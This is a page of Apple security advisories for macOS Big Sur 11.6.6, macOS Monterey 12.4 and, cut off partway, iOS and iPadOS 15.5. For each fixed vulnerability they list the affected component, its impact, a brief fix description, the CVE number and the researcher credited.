Apple Security Advisory 2022-05-16-3 - macOS Big Sur 11.6.6 addresses bypass, code execution, denial of service, out of bounds access, out of bounds read, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-05-16-3 macOS Big Sur 11.6.6

macOS Big Sur 11.6.6 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213256.

apache  
Available for: macOS Big Sur  
Impact: Multiple issues in apache  
Description: Multiple issues were addressed by updating apache to  
version 2.4.53.  
CVE-2021-44224  
CVE-2021-44790  
CVE-2022-22719  
CVE-2022-22720  
CVE-2022-22721

AppKit  
Available for: macOS Big Sur  
Impact: A malicious application may be able to gain root privileges  
Description: A logic issue was addressed with improved validation.  
CVE-2022-22665: Lockheed Martin Red Team

AppleAVD  
Available for: macOS Big Sur  
Impact: An application may be able to execute arbitrary code with  
kernel privileges. Apple is aware of a report that this issue may  
have been actively exploited.  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-22675: an anonymous researcher

AppleGraphicsControl  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted image may lead to arbitrary  
code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2022-26751: Michael DePlante (@izobashi) of Trend Micro Zero Day  
Initiative

AppleScript  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted AppleScript binary may  
result in unexpected application termination or disclosure of process  
memory  
Description: An out-of-bounds read issue was addressed with improved  
bounds checking.  
CVE-2022-26698: Qi Sun of Trend Micro

AppleScript  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted AppleScript binary may  
result in unexpected application termination or disclosure of process  
memory  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2022-26697: Qi Sun and Robert Ai of Trend Micro

CoreTypes  
Available for: macOS Big Sur  
Impact: A malicious application may bypass Gatekeeper checks  
Description: This issue was addressed with improved checks to prevent  
unauthorized actions.  
CVE-2022-22663: Arsenii Kostromin (0x3c3e)

CVMS  
Available for: macOS Big Sur  
Impact: A malicious application may be able to gain root privileges  
Description: A memory initialization issue was addressed.  
CVE-2022-26721: Yonghwi Jin (@jinmo123) of Theori  
CVE-2022-26722: Yonghwi Jin (@jinmo123) of Theori

DriverKit  
Available for: macOS Big Sur  
Impact: A malicious application may be able to execute arbitrary code  
with system privileges  
Description: An out-of-bounds access issue was addressed with  
improved bounds checking.  
CVE-2022-26763: Linus Henze of Pinauten GmbH (pinauten.de)

Graphics Drivers  
Available for: macOS Big Sur  
Impact: A local user may be able to read kernel memory  
Description: An out-of-bounds read issue existed that led to the  
disclosure of kernel memory. This was addressed with improved input  
validation.  
CVE-2022-22674: an anonymous researcher

Intel Graphics Driver  
Available for: macOS Big Sur  
Impact: A malicious application may be able to execute arbitrary code  
with kernel privileges  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-26720: Liu Long of Ant Security Light-Year Lab

Intel Graphics Driver  
Available for: macOS Big Sur  
Impact: A malicious application may be able to execute arbitrary code  
with kernel privileges  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2022-26770: Liu Long of Ant Security Light-Year Lab

Intel Graphics Driver  
Available for: macOS Big Sur  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-26756: Jack Dates of RET2 Systems, Inc

Intel Graphics Driver  
Available for: macOS Big Sur  
Impact: A malicious application may be able to execute arbitrary code  
with kernel privileges  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2022-26769: Antonio Zekic (@antoniozekic)

Intel Graphics Driver  
Available for: macOS Big Sur  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-26748: Jeonghoon Shin of Theori working with Trend Micro  
Zero Day Initiative

IOMobileFrameBuffer  
Available for: macOS Big Sur  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
state management.  
CVE-2022-26768: an anonymous researcher

Kernel  
Available for: macOS Big Sur  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26714: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs  
(@starlabs_sg)

Kernel  
Available for: macOS Big Sur  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-26757: Ned Williamson of Google Project Zero

LaunchServices  
Available for: macOS Big Sur  
Impact: A malicious application may be able to bypass Privacy  
preferences  
Description: The issue was addressed with additional permissions  
checks.  
CVE-2022-26767: Wojciech Reguła (@_r3ggi) of SecuRing

LaunchServices  
Available for: macOS Big Sur  
Impact: A sandboxed process may be able to circumvent sandbox  
restrictions  
Description: An access issue was addressed with additional sandbox  
restrictions on third-party applications.  
CVE-2022-26706: Arsenii Kostromin (0x3c3e)

libresolv  
Available for: macOS Big Sur  
Impact: An attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: This issue was addressed with improved checks.  
CVE-2022-26776: Zubair Ashraf of Crowdstrike, Max Shavrick (@_mxms)  
of the Google Security Team

LibreSSL  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted certificate may lead to a  
denial of service  
Description: A denial of service issue was addressed with improved  
input validation.  
CVE-2022-0778

libxml2  
Available for: macOS Big Sur  
Impact: A remote attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-23308

OpenSSL  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted certificate may lead to a  
denial of service  
Description: This issue was addressed with improved checks.  
CVE-2022-0778

PackageKit  
Available for: macOS Big Sur  
Impact: A malicious application may be able to modify protected parts  
of the file system  
Description: This issue was addressed by removing the vulnerable  
code.  
CVE-2022-26712: Mickey Jin (@patch1t)

Printing  
Available for: macOS Big Sur  
Impact: A malicious application may be able to bypass Privacy  
preferences  
Description: This issue was addressed by removing the vulnerable  
code.  
CVE-2022-26746: @gorelics

Security  
Available for: macOS Big Sur  
Impact: A malicious app may be able to bypass signature validation  
Description: A certificate parsing issue was addressed with improved  
checks.  
CVE-2022-26766: Linus Henze of Pinauten GmbH (pinauten.de)

SMB  
Available for: macOS Big Sur  
Impact: An application may be able to gain elevated privileges  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2022-26718: Peter Nguyễn Vũ Hoàng of STAR Labs

SMB  
Available for: macOS Big Sur  
Impact: Mounting a maliciously crafted Samba network share may lead  
to arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2022-26723: Felix Poulin-Belanger

SMB  
Available for: macOS Big Sur  
Impact: An application may be able to gain elevated privileges  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-26715: Peter Nguyễn Vũ Hoàng of STAR Labs

SoftwareUpdate  
Available for: macOS Big Sur  
Impact: A malicious application may be able to access restricted  
files  
Description: This issue was addressed with improved entitlements.  
CVE-2022-26728: Mickey Jin (@patch1t)

TCC  
Available for: macOS Big Sur  
Impact: An app may be able to capture a user's screen  
Description: This issue was addressed with improved checks.  
CVE-2022-26726: an anonymous researcher

Tcl  
Available for: macOS Big Sur  
Impact: A malicious application may be able to break out of its  
sandbox  
Description: This issue was addressed with improved environment  
sanitization.  
CVE-2022-26755: Arsenii Kostromin (0x3c3e)

Vim  
Available for: macOS Big Sur  
Impact: Multiple issues in Vim  
Description: Multiple issues were addressed by updating Vim.  
CVE-2021-4136  
CVE-2021-4166  
CVE-2021-4173  
CVE-2021-4187  
CVE-2021-4192  
CVE-2021-4193  
CVE-2021-46059  
CVE-2022-0128

WebKit  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted mail message may lead to  
running arbitrary javascript  
Description: A validation issue was addressed with improved input  
sanitization.  
CVE-2022-22589: Heige of KnownSec 404 Team (knownsec.com) and Bo Qu  
of Palo Alto Networks (paloaltonetworks.com)

Wi-Fi  
Available for: macOS Big Sur  
Impact: A malicious application may disclose restricted memory  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26745: an anonymous researcher

Wi-Fi  
Available for: macOS Big Sur  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
memory handling.  
CVE-2022-26761: Wang Yu of Cyberserval

zip  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted file may lead to a denial of  
service  
Description: A denial of service issue was addressed with improved  
state handling.  
CVE-2022-0530

zlib  
Available for: macOS Big Sur  
Impact: An attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2018-25032: Tavis Ormandy

zsh  
Available for: macOS Big Sur  
Impact: A remote attacker may be able to cause arbitrary code  
execution  
Description: This issue was addressed by updating to zsh version  
5.8.1.  
CVE-2021-45444

Additional recognition

Bluetooth  
We would like to acknowledge Jann Horn of Project Zero for their  
assistance.

macOS Big Sur 11.6.6 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmKC1TUACgkQeC9qKD1p  
rhgJBg/9HpPp6P2OtFdYHigfaoga/3szMAjXC650MlC2rF1lXyTRVsO54eupz4er  
K8Iud3+YnDVTUKkadftWt2XdxAADGtfEFhJW584RtnWjeli+XtGEjQ8jD1/MNPJW  
qtnrOh2pYG9SxolKDofhiecbYxIGppRKSDRFl0/3VGFed2FIpiRDunlttHBEhHu/  
vZVSFzMrNbGvhju+ZCdwFLKXOgB851aRSeo9Xkt63tSGiee7rLmVAINyFbbPwcVP  
yXwMvn0TNodCBn0wBWD0+iQ3UXIDIYSPaM1Z0BQxVraEhK3Owro3JKgqNbWswMvj  
SY0KUulbAPs3aOeyz1BI70npYA3+Qwd+bk2hxbzbU/AxvxCrsEk04QfxLYqvj0mR  
VZYPcup2KAAkiTeekQ5X739r8NAyaaI+bp7FllFv/Z2jVW9kGgNIFr46R05MD9NF  
aC1JAZtJ4VWbMEGHnHAMrOgdGaHpryvzl2BjUXRgW27vIq5uF5YiNcpjS2BezTFc  
R2ojiMNRB33Y44LlH7Zv3gHm4bE3+NzcGeWvBzwOsHznk9Jiv6x2eBUxkttMlPyO  
zymQMONQN3bktSMT8JnmJ8rlEgISONd7NeTEzuhlGIWaWNAFmmBoPnBiPk+yC3n4  
d22yFs6DLp2pJ+0zOWmTcqt1xYng05Jwj4F0KT49w0TO9Up79+o=  
=rtPl  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-05-16-3

Apple Security Advisory 2022-05-16-2 - macOS Monterey 12.4 addresses buffer overflow, bypass, code execution, denial of service, integer overflow, out of bounds access, out of bounds read, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-05-16-2 macOS Monterey 12.4

macOS Monterey 12.4 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213257.

AMD  
Available for: macOS Monterey  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
state management.  
CVE-2022-26772: an anonymous researcher

AMD  
Available for: macOS Monterey  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A buffer overflow issue was addressed with improved  
memory handling.  
CVE-2022-26741: ABC Research s.r.o  
CVE-2022-26742: ABC Research s.r.o  
CVE-2022-26749: ABC Research s.r.o  
CVE-2022-26750: ABC Research s.r.o  
CVE-2022-26752: ABC Research s.r.o  
CVE-2022-26753: ABC Research s.r.o  
CVE-2022-26754: ABC Research s.r.o

apache  
Available for: macOS Monterey  
Impact: Multiple issues in apache  
Description: Multiple issues were addressed by updating apache to  
version 2.4.53.  
CVE-2021-44224  
CVE-2021-44790  
CVE-2022-22719  
CVE-2022-22720  
CVE-2022-22721

AppleGraphicsControl  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted image may lead to arbitrary  
code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2022-26751: Michael DePlante (@izobashi) of Trend Micro Zero Day  
Initiative

AppleScript  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted AppleScript binary may  
result in unexpected application termination or disclosure of process  
memory  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2022-26697: Qi Sun and Robert Ai of Trend Micro

AppleScript  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted AppleScript binary may  
result in unexpected application termination or disclosure of process  
memory  
Description: An out-of-bounds read issue was addressed with improved  
bounds checking.  
CVE-2022-26698: Qi Sun of Trend Micro

AVEVideoEncoder  
Available for: macOS Monterey  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-26736: an anonymous researcher  
CVE-2022-26737: an anonymous researcher  
CVE-2022-26738: an anonymous researcher  
CVE-2022-26739: an anonymous researcher  
CVE-2022-26740: an anonymous researcher

Contacts  
Available for: macOS Monterey  
Impact: A plug-in may be able to inherit the application's  
permissions and access user data  
Description: This issue was addressed with improved checks.  
CVE-2022-26694: Wojciech Reguła (@_r3ggi) of SecuRing

CVMS  
Available for: macOS Monterey  
Impact: A malicious application may be able to gain root privileges  
Description: A memory initialization issue was addressed.  
CVE-2022-26721: Yonghwi Jin (@jinmo123) of Theori  
CVE-2022-26722: Yonghwi Jin (@jinmo123) of Theori

DriverKit  
Available for: macOS Monterey  
Impact: A malicious application may be able to execute arbitrary code  
with system privileges  
Description: An out-of-bounds access issue was addressed with  
improved bounds checking.  
CVE-2022-26763: Linus Henze of Pinauten GmbH (pinauten.de)

ImageIO  
Available for: macOS Monterey  
Impact: A remote attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: An integer overflow issue was addressed with improved  
input validation.  
CVE-2022-26711: actae0n of Blacksun Hackers Club working with Trend  
Micro Zero Day Initiative

ImageIO  
Available for: macOS Monterey  
Impact: Photo location information may persist after it is removed  
with Preview Inspector  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-26725: Andrew Williams and Avi Drissman of Google

Intel Graphics Driver  
Available for: macOS Monterey  
Impact: A malicious application may be able to execute arbitrary code  
with kernel privileges  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-26720: Liu Long of Ant Security Light-Year Lab

Intel Graphics Driver  
Available for: macOS Monterey  
Impact: A malicious application may be able to execute arbitrary code  
with kernel privileges  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2022-26769: Antonio Zekic (@antoniozekic)

Intel Graphics Driver  
Available for: macOS Monterey  
Impact: A malicious application may be able to execute arbitrary code  
with kernel privileges  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2022-26770: Liu Long of Ant Security Light-Year Lab

Intel Graphics Driver  
Available for: macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-26748: Jeonghoon Shin of Theori working with Trend Micro  
Zero Day Initiative

Intel Graphics Driver  
Available for: macOS Monterey  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-26756: Jack Dates of RET2 Systems, Inc

IOKit  
Available for: macOS Monterey  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A race condition was addressed with improved locking.  
CVE-2022-26701: chenyuwang (@mzzzz__) of Tencent Security Xuanwu Lab

IOMobileFrameBuffer  
Available for: macOS Monterey  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
state management.  
CVE-2022-26768: an anonymous researcher

Kernel  
Available for: macOS Monterey  
Impact: An attacker that has already achieved code execution in macOS  
Recovery may be able to escalate to kernel privileges  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-26743: Jordy Zomer (@pwningsystems)

Kernel  
Available for: macOS Monterey  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26714: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs  
(@starlabs_sg)

Kernel  
Available for: macOS Monterey  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-26757: Ned Williamson of Google Project Zero

Kernel  
Available for: macOS Monterey  
Impact: An attacker that has already achieved kernel code execution  
may be able to bypass kernel memory mitigations  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26764: Linus Henze of Pinauten GmbH (pinauten.de)

Kernel  
Available for: macOS Monterey  
Impact: A malicious attacker with arbitrary read and write capability  
may be able to bypass Pointer Authentication  
Description: A race condition was addressed with improved state  
handling.  
CVE-2022-26765: Linus Henze of Pinauten GmbH (pinauten.de)

LaunchServices  
Available for: macOS Monterey  
Impact: A sandboxed process may be able to circumvent sandbox  
restrictions  
Description: An access issue was addressed with additional sandbox  
restrictions on third-party applications.  
CVE-2022-26706: Arsenii Kostromin (0x3c3e)

LaunchServices  
Available for: macOS Monterey  
Impact: A malicious application may be able to bypass Privacy  
preferences  
Description: The issue was addressed with additional permissions  
checks.  
CVE-2022-26767: Wojciech Reguła (@_r3ggi) of SecuRing

libresolv  
Available for: macOS Monterey  
Impact: An attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: This issue was addressed with improved checks.  
CVE-2022-26776: Zubair Ashraf of Crowdstrike, Max Shavrick (@_mxms)  
of the Google Security Team  
CVE-2022-26708: Max Shavrick (@_mxms) of the Google Security Team

libresolv  
Available for: macOS Monterey  
Impact: An attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: An integer overflow was addressed with improved input  
validation.  
CVE-2022-26775: Max Shavrick (@_mxms) of the Google Security Team

LibreSSL  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted certificate may lead to a  
denial of service  
Description: A denial of service issue was addressed with improved  
input validation.  
CVE-2022-0778

libxml2  
Available for: macOS Monterey  
Impact: A remote attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-23308

OpenSSL  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted certificate may lead to a  
denial of service  
Description: This issue was addressed with improved checks.  
CVE-2022-0778

PackageKit  
Available for: macOS Monterey  
Impact: A malicious application may be able to modify protected parts  
of the file system  
Description: This issue was addressed by removing the vulnerable  
code.  
CVE-2022-26712: Mickey Jin (@patch1t)

PackageKit  
Available for: macOS Monterey  
Impact: A malicious application may be able to modify protected parts  
of the file system  
Description: This issue was addressed with improved entitlements.  
CVE-2022-26727: Mickey Jin (@patch1t)

Preview  
Available for: macOS Monterey  
Impact: A plug-in may be able to inherit the application's  
permissions and access user data  
Description: This issue was addressed with improved checks.  
CVE-2022-26693: Wojciech Reguła (@_r3ggi) of SecuRing

Printing  
Available for: macOS Monterey  
Impact: A malicious application may be able to bypass Privacy  
preferences  
Description: This issue was addressed by removing the vulnerable  
code.  
CVE-2022-26746: @gorelics

Safari Private Browsing  
Available for: macOS Monterey  
Impact: A malicious website may be able to track users in Safari  
private browsing mode  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-26731: an anonymous researcher

Security  
Available for: macOS Monterey  
Impact: A malicious app may be able to bypass signature validation  
Description: A certificate parsing issue was addressed with improved  
checks.  
CVE-2022-26766: Linus Henze of Pinauten GmbH (pinauten.de)

SMB  
Available for: macOS Monterey  
Impact: An application may be able to gain elevated privileges  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-26715: Peter Nguyễn Vũ Hoàng of STAR Labs

SMB  
Available for: macOS Monterey  
Impact: An application may be able to gain elevated privileges  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2022-26718: Peter Nguyễn Vũ Hoàng of STAR Labs

SMB  
Available for: macOS Monterey  
Impact: Mounting a maliciously crafted Samba network share may lead  
to arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2022-26723: Felix Poulin-Belanger

SoftwareUpdate  
Available for: macOS Monterey  
Impact: A malicious application may be able to access restricted  
files  
Description: This issue was addressed with improved entitlements.  
CVE-2022-26728: Mickey Jin (@patch1t)

Spotlight  
Available for: macOS Monterey  
Impact: An app may be able to gain elevated privileges  
Description: A validation issue existed in the handling of symlinks  
and was addressed with improved validation of symlinks.  
CVE-2022-26704: an anonymous researcher

TCC  
Available for: macOS Monterey  
Impact: An app may be able to capture a user's screen  
Description: This issue was addressed with improved checks.  
CVE-2022-26726: an anonymous researcher

Tcl  
Available for: macOS Monterey  
Impact: A malicious application may be able to break out of its  
sandbox  
Description: This issue was addressed with improved environment  
sanitization.  
CVE-2022-26755: Arsenii Kostromin (0x3c3e)

WebKit  
Available for: macOS Monterey  
Impact: Processing maliciously crafted web content may lead to code  
execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 238178  
CVE-2022-26700: ryuzaki

WebKit  
Available for: macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
WebKit Bugzilla: 236950  
CVE-2022-26709: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua  
wingtecher lab  
WebKit Bugzilla: 237475  
CVE-2022-26710: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua  
wingtecher lab  
WebKit Bugzilla: 238171  
CVE-2022-26717: Jeonghoon Shin of Theori

WebKit  
Available for: macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 238183  
CVE-2022-26716: SorryMybad (@S0rryMybad) of Kunlun Lab  
WebKit Bugzilla: 238699  
CVE-2022-26719: Dongzhuo Zhao working with ADLab of Venustech

WebRTC  
Available for: macOS Monterey  
Impact: Video self-preview in a webRTC call may be interrupted if the  
user answers a phone call  
Description: A logic issue in the handling of concurrent media was  
addressed with improved state handling.  
WebKit Bugzilla: 237524  
CVE-2022-22677: an anonymous researcher

Wi-Fi  
Available for: macOS Monterey  
Impact: A malicious application may disclose restricted memory  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26745: an anonymous researcher

Wi-Fi  
Available for: macOS Monterey  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
memory handling.  
CVE-2022-26761: Wang Yu of Cyberserval

Wi-Fi  
Available for: macOS Monterey  
Impact: A malicious application may be able to execute arbitrary code  
with system privileges  
Description: A memory corruption issue was addressed with improved  
memory handling.  
CVE-2022-26762: Wang Yu of Cyberserval

zip  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted file may lead to a denial of  
service  
Description: A denial of service issue was addressed with improved  
state handling.  
CVE-2022-0530

zlib  
Available for: macOS Monterey  
Impact: An attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2018-25032: Tavis Ormandy

zsh  
Available for: macOS Monterey  
Impact: A remote attacker may be able to cause arbitrary code  
execution  
Description: This issue was addressed by updating to zsh version  
5.8.1.  
CVE-2021-45444

Additional recognition

AppleMobileFileIntegrity  
We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing  
for their assistance.

Bluetooth  
We would like to acknowledge Jann Horn of Project Zero for their  
assistance.

Calendar  
We would like to acknowledge Eugene Lim of Government Technology  
Agency of Singapore for their assistance.

FaceTime  
We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing  
for their assistance.

FileVault  
We would like to acknowledge Benjamin Adolphi of Promon Germany GmbH  
for their assistance.

Login Window  
We would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive  
Security for their assistance.

Photo Booth  
We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing  
for their assistance.

System Preferences  
We would like to acknowledge Mohammad Tausif Siddiqui  
(@toshsiddiqui), an anonymous researcher for their assistance.

WebKit  
We would like to acknowledge James Lee, an anonymous researcher for  
their assistance.

Wi-Fi  
We would like to acknowledge Dana Morrison for their assistance.

macOS Monterey 12.4 may be obtained from the Mac App Store or Apple's  
Software Downloads web site: https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmKC1TUACgkQeC9qKD1p  
rhigoQ//cTnC2MOYau+vO6pv8PHMbeEWPPvtsGpemCNz4iChXRhVOHKxgMQAHEgg  
Ejpxvw5D1jg12wroXypL8ADOD1V20OA7u5A20Lip1NIDL145692jPfmGuNxqkRnI  
DyoykhUogRL8Yvzkd5P8D3Jlo0EzCa4ZhO4tqBwbrGQZRb7gHclMPtzlgt15ZIma  
mH42QGRkJcK8v4MWNIxvibnQPwx3we2k4T8FajBvoCxYinMOlg/j16hFREj8Src+  
rQwKPV6JHiBBQ3LQpGeBlJrFLH72CyHbCu8IqWFYvvDXsT5Gr9JoagW7+g/9+8Wc  
402HjkY4wOZrxIBtlaUlNFZuB1mtIv8amHn9AaVOK/7GALSP6MQzA+U3HUqd3hYV  
J23pw6iRWBTZZSmO31kdEGU/X9uDkDKJL6QxUfzVXPVmOs0VNMmOJUdTRKf3tdsa  
5qnPcjowRONgltX8NqIP0q4aJPr1WigtFGyASIr3me/t9Ft7Kss4gJt7YLDsN6MZ  
opD8hTRHSAXAAYsA57omyo/DnmajHIbUGVEujzAh/DOEYxgT9aaaAHnkNuaQgIbs  
Z5g/dfhDaJodyk0q7BIeK+RPbkvrJvnoBWkRnAUaSgYMX14DQdExlBEvbpcPg71f  
LHzUlUewIuuP/57huTz/b4vEEke0JUwrWk6T1ACbndL3FsPIOX4=  
=jaCZ  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-05-16-2

Apple Security Advisory 2022-05-16-1 - iOS 15.5 and iPadOS 15.5 addresses bypass, code execution, denial of service, integer overflow, out of bounds access, out of bounds write, and use-after-free vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2022-05-16-1 iOS 15.5 and iPadOS 15.5iOS 15.5 and iPadOS 15.5 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213258.AppleAVDAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An application may be able to execute arbitrary code withkernel privilegesDescription: A use after free issue was addressed with improvedmemory management.CVE-2022-26702: an anonymous researcherAppleGraphicsControlAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: Processing a maliciously crafted image may lead to arbitrarycode executionDescription: A memory corruption issue was addressed with improvedinput validation.CVE-2022-26751: Michael DePlante (@izobashi) of Trend Micro Zero DayInitiativeAVEVideoEncoderAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An application may be able to execute arbitrary code withkernel privilegesDescription: An out-of-bounds write issue was addressed with improvedbounds checking.CVE-2022-26736: an anonymous researcherCVE-2022-26737: an anonymous researcherCVE-2022-26738: an anonymous researcherCVE-2022-26739: an anonymous researcherCVE-2022-26740: an anonymous researcherDriverKitAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A malicious application may be able to execute arbitrary codewith system privilegesDescription: An out-of-bounds access issue was addressed withimproved bounds checking.CVE-2022-26763: Linus Henze of Pinauten GmbH (pinauten.de)GPU DriversAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An application may be able to execute arbitrary code withkernel privilegesDescription: A memory corruption issue was addressed with improvedstate management.CVE-2022-26744: an anonymous researcherImageIOAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A remote attacker may be able to cause unexpected applicationtermination or arbitrary code executionDescription: An integer overflow issue was addressed with improvedinput validation.CVE-2022-26711: actae0n of Blacksun Hackers Club working with TrendMicro Zero Day InitiativeIOKitAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An application may be able to execute arbitrary code withkernel privilegesDescription: A race condition was addressed with improved locking.CVE-2022-26701: chenyuwang (@mzzzz__) of Tencent Security Xuanwu LabIOMobileFrameBufferAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An application may be able to execute arbitrary code withkernel privilegesDescription: A memory corruption issue was addressed with improvedstate management.CVE-2022-26768: an anonymous researcherIOSurfaceAcceleratorAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A malicious application may be able to execute arbitrary codewith kernel privilegesDescription: A memory corruption issue was addressed with improvedstate management.CVE-2022-26771: an anonymous researcherKernelAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 